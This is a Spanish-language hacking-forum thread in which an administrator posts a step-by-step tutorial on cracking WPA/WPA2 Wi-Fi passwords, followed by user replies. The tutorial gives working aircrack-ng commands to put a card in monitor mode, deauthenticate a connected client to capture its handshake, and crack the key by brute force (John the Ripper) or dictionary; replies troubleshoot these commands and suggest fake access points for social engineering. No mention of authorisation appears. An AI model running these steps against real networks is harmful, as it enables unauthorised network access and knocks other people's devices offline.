comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Taller de Seguridad Wireless #4

  • 24 Respuestas
  • 13498 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5375
  • Actividad:
    73.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Septiembre 28, 2014, 03:40:52 pm »

Introducción

Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo.
Para lo que no sepan lo que es el Handshake se genera en el momento en el que un dispositivo se conecta en una red. La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres, por lo que parece imposible crackear la clave.


Como se muestra en la imagen, el dispositivo envía una solicitud de conexión al router, el router responde pidiendo la clave de acceso, el dispositivo envía la clave de acceso. El router responde a esa autenticación, si es correcta se produce la asociación a la red y el router responde con un OK, es decir, lo asocia a la red.

Esta negociación que se produce, es el Handshake (Apretón de manos) y lo que haremos en este taller, será capturarlo y descifrarlo, ya que la contraseña viene cifrada dentro de él.

No hay ninguna diferencia entre el crackeo de redes WPA o WPA2. El método de autenticación es básicamente el mismo. Por lo que las técnicas a usar son idénticas.

Colocando nuestra interface en modo monitor

Lo que haremos ahora será ver el nombre de nuestra interface, para ello tipeamos lo siguiente:

airmon-ng


En mi caso figuran dos interfaces:

Wlan2: La placa de red que tiene mi notebook
Wlan1: Mi USB Wifi externo

Debido a que la placa de mi notebook no sirve para usarla con aircrack, usaré mi USB Wifi externo, es decir, la Wlan1
Ahora la pondremos en modo monitor con el siguiente comando:

airmon-ng start wlan1


Como muestra la imagen, la coloca en modo monitor
(Monitor mode enablen on mon0)

Scanneo de las redes cercanas

Para ver las redes que tenemos cerca, lanzaremos el siguiente comando:

airodump-ng mon0


Como bien dijimos al principio de este taller, el Handshake se genera a la hora de que un cliente se conecta a la red. Es por ello, que nuestro objetivo ahora será tirar a un cliente conectado, y cuando intente conectarse nuevamente, capturaremos ese Handshake.

Lo que debemos recordar de esta consola, son los siguientes datos:

BSSID (MAC del router)
STATION (MAC del Cliente conectado)
CH (Canal)

Frenamos el scanneo con la siguiente combinación de teclas CTRL + C

Seguido a esto, colocamos el siguiente comando:

airodump-ng mon0 --channel 1 --bssid D8:5D:4C:C7:DC:EE -w /underc0de

Explicaré brevemente los parámetros de este comando:

mon0 (Nuestra interface en modo monitor)
--channel (Canal)
--bssid (MAC del router al que atacaremos)
-w (Nombre del archivo en donde se guardará el handshake)

Volveremos a ver la misma pantalla que la anterior, pero esta vez solo observaremos el movimiento que está generando el router al que atraparemos.

Capturando el Handshake

En una nueva consola, procederemos a conectar uno de los clientes conectados para capturarle el Handshake, para ello, tipearemos el siguiente comando:

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0


En caso de que al tipear el comando, aparezca un error como el de la imagen, al mismo comando le añadimos --ignore-negative-one

aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0 --ignore-negative-one

Esto sucede porque tenemos que aplicarle un parche a nuestro kernel, pero la forma más rápida es añadiendo la extensión al comando como hicimos.

Al ejecutar el comando, veremos como desconecta al cliente conectado, y en la otra consola podremos ver lo siguiente en la parte superior:


Como podemos observar, aparece el [WPA handshake D8:5D:4C:C7:DC:EE]

Eso quiere decir que ya capturamos el Handshake de la red. Ahora podemos cerrar todas las consolas activas e iniciar el proceso de cracking.

Crackeando el Handshake por Fuerza bruta

Para crackear el handshake por fuerza bruta, utilizaremos John The Ripper, el cual es un excelente para este tipo de tareas.

En una consola tipeamos lo siguiente

john –stdout:XX --incremental:YY | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /underc0de*.cap

En el comando se pueden reemplazar las XX por:

alpha  (solo letras)
digits  (solo números)
alnum   (numeros y letras)
all  (Todos los caracteres incluidos ",.-#%&)

Las YY son los números de caracteres que puede tener la contraseña, si colocamos 8, John the ripper combinará desde 1 hasta 8 caracteres.


Lo malo de esto, es que puede demorar desde minutos a años en sacar una clave. Y depende mucho del hardware que tengamos en nuestra pc.

Crackeando el Handshake por Diccionario

Para poder romper la clave por diccionario, colocaremos en la consola el siguiente comando:

aircrack-ng -w diccionario.txt -b D8:5D:4C:C7:DC:EE /underc0de*.cap

Rapidamente explicaré los parámetros del comando

-w (Nombre del diccionario)
-b (MAC del router)

Y finalmente el nombre del Handshake


No tienes permisos para ver links. Registrate o Entra con tu cuenta



Conectado Gabriela

  • *
  • Co Admin
  • Mensajes: 873
  • Actividad:
    11.67%
  • Reputación 15
    • Ver Perfil
    • Email
« Respuesta #1 en: Septiembre 28, 2014, 05:54:27 pm »
 
Excelente aporte! Gracias.

G.

PD: Sed buenos.  ;D

Desconectado facufangio

  • *
  • Underc0der
  • Mensajes: 152
  • Actividad:
    0%
  • Reputación 0
  • < SE SIEMPRE EL MEJOR, PERO NO TE LO CREAS />
    • Ver Perfil
    • Email
« Respuesta #2 en: Septiembre 28, 2014, 10:14:05 pm »
Descargando y guardando.

Gracias.

Desconectado herculano

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Septiembre 30, 2014, 06:36:37 am »
Buenos dias, una pregunta, ¿diccionarios de donde se pueden sacar?
« Última modificación: Octubre 01, 2014, 01:07:02 pm por fermino »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    20%
  • Reputación 15
    • Ver Perfil
« Respuesta #4 en: Septiembre 30, 2014, 06:44:55 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
buenos dias una pregunta diccionarios donde se pueden sacar?

Te dejo unos enlaces y unas webs donde puedes descargartelos:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Dependiendo de para que, necesitarás descargarte uno u otro.

Un saludo.
« Última modificación: Septiembre 30, 2014, 06:46:31 am por blackdrake »



Desconectado herculano

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Septiembre 30, 2014, 08:00:51 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
buenos dias una pregunta diccionarios donde se pueden sacar?

Te dejo unos enlaces y unas webs donde puedes descargartelos:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Dependiendo de para que, necesitarás descargarte uno u otro.

Un saludo.

muchas gracias blackdrake  :) :) :) :)

Desconectado herculano

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Septiembre 30, 2014, 08:59:11 am »
Tengo un problema pongo este comando para realizar fuerza bruta con mi router
 john -stdout: all --incremental:10 | aircrack-ng -b  MAC -w - mia-01.cap

y me sale esto:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Password files specified, but no option would use them
Opening mia-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 beta3
Passphrase not in dictionary                           

Quitting aircrack-ng...
pero el problema es que no tarda ni 1 segundo y sale eso


alguien me puede ayudar?
« Última modificación: Octubre 02, 2014, 09:05:32 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5375
  • Actividad:
    73.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #7 en: Septiembre 30, 2014, 09:45:53 am »
Probá asi:

john –stdout –incremental:all | aircrack-ng -b MAC -w – fichero.cap

Recordá estar parado en el directorio en donde se encuentra el .cap

Saludos!
ANTRAX


Desconectado herculano

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Octubre 01, 2014, 08:38:16 am »
Asi si que va Antrax gracias! y eso que prueba todo tipo de contraseñas de tamaño de caracteres? porque "all" significa que todo letras,simblos,numeros pero el tamaño de caracteres de contraseña donde lo pone?

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5375
  • Actividad:
    73.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #9 en: Octubre 01, 2014, 08:47:20 am »
A eso lo puedes modificar como muestra el paper.

john –stdout –incremental:10 | aircrack-ng -b MAC -w – fichero.cap


Desconectado herculano

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Octubre 02, 2014, 08:48:20 am »
Hola buenas tardes tengo una consulta cuando yo
Escribo este codigo:

 
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
aireplay-ng -0 7676 -a MAC BSSID -c MI MAC mon0
Y el Me responde esto:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
13:07:38  Waiting for beacon frame (BSSID: MAC BSSID) on channel 1
13:07:40  Sending 64 directed DeAuth. STMAC: [MI MAC][ 0|36 ACKs]
13:07:40  Sending 64 directed DeAuth. STMAC: [MI MAC][ 0|44 ACKs]


Y no me sale como en tu tutorial que sale por ejemplo [ 47|36 ACKs]
y no entiendo el motivo la tarjeta de red es la misma
« Última modificación: Octubre 02, 2014, 08:49:38 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5375
  • Actividad:
    73.33%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #11 en: Octubre 02, 2014, 08:52:21 am »
Proba con otro cliente conectado.
Si no te funciona con uno, ve con el que sigue.. y así hasta que te inyecte

Saludos!
ANTRAX


Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #12 en: Octubre 03, 2014, 06:19:35 am »
Muy bueno como siempre  ;D

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado kuro

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Febrero 02, 2017, 09:21:46 pm »
Gracias por la info!

Entiendo que este método no es el mejor ya que por fuerza bruta, si has puesto una contraseña de complejidad media podés tardar la vida en sacar la pass por lo que no veo que sea muy útil. Creo que es más útil realizar un Fake AP y tirar un poco de ingeniería social, utilizando Linset, no?

Un saludo!

Desconectado Stiuvert

  • *
  • Colaborador
  • *
  • Mensajes: 2667
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #14 en: Febrero 03, 2017, 07:24:05 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Gracias por la info!

Entiendo que este método no es el mejor ya que por fuerza bruta, si has puesto una contraseña de complejidad media podés tardar la vida en sacar la pass por lo que no veo que sea muy útil. Creo que es más útil realizar un Fake AP y tirar un poco de ingeniería social, utilizando Linset, no?

Un saludo!

Exactamente, si con WPS o fuerza bruta no puedes, solo te quedaría mediante ingeniera social utilizando un fake AP.

Saludos

Desconectado EduX-c0d3

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
  • Soy EduX :)
    • Ver Perfil
    • Email
« Respuesta #15 en: Febrero 05, 2017, 04:14:58 pm »
Lo unico que me sale mal.. es cuando uso 'kali' .. al querer montar a modo monitor.. queda en wlan0mon y si la vuelto a 'airmon-ng stop' queda.. wlan0monmon .. jeje.. solucion?

Desconectado AncientOne

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #16 en: Febrero 13, 2017, 08:50:59 pm »
Excelente trabajo, he querido aprender a como hacerlo, lo intentare y veré que tal, gracias por el aporte.  ;D Por cierto, una duda, ¿todo el proceso puede hacerse sin alguna conexión Wi-Fi?
« Última modificación: Febrero 14, 2017, 07:02:56 pm por AncientOne »
Push yourself as far as you can and when you can't keep going until the end...

Desconectado kawaxi

  • *
  • Underc0der
  • Mensajes: 96
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #17 en: Febrero 14, 2017, 06:22:39 pm »
mi estimado, en tu experiencia las tarjetas incluidas en las laptops permiten la inyeccion? ....

Conectado xyz

  • *
  • Moderador Global
  • Mensajes: 448
  • Actividad:
    21.67%
  • Reputación 10
    • Ver Perfil
    • Under0cde
« Respuesta #18 en: Febrero 20, 2017, 06:42:23 pm »
Lo recomendable, es buscar que modelo de placa tienes, en base a eso, verificar si el chipset soporta inyección o solo monitor.

saludos.

Desconectado Rikt

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #19 en: Octubre 04, 2017, 08:47:30 pm »
Cuando voy a realizar el comando
 aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0

no funciona, incluso con:
aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 00:25:D3:4C:1B:84 mon0 --ignore-negative-one

¿Porque ocurre esto?
Uso un boot, pero no es persistente.

Otra cosa remarcable es que cuando realizo el analisis de red, las bssid solo me salen al principio , y van desapareciendo (para verlas tengo que hacer un pantallazo), hasta no salir ninguna, de hecho algunas veces no aparece la station correspondiente.
Me aparecen las station por otro lado con los  data ch etc...
« Última modificación: Octubre 04, 2017, 09:06:09 pm por Rikt »

 

¿Te gustó el post? COMPARTILO!



Taller de pentesting con Kali Linux - Parte I

Iniciado por ANTRAX

Respuestas: 55
Vistas: 31622
Último mensaje Febrero 28, 2018, 02:23:37 am
por lynch512
Taller de Pentesting con Kali Linux #2

Iniciado por ANTRAX

Respuestas: 32
Vistas: 21930
Último mensaje Noviembre 10, 2017, 07:40:18 am
por Brittsman97
Taller de Programacion en Batch #2

Iniciado por ANTRAX

Respuestas: 9
Vistas: 5810
Último mensaje Junio 03, 2015, 11:08:02 am
por ShineW
Taller de Programacion en Android #1

Iniciado por ANTRAX

Respuestas: 16
Vistas: 8961
Último mensaje Septiembre 27, 2015, 05:55:57 pm
por www
Taller Programación en Batch #1

Iniciado por ANTRAX

Respuestas: 5
Vistas: 9928
Último mensaje Octubre 21, 2014, 04:53:53 pm
por drotha2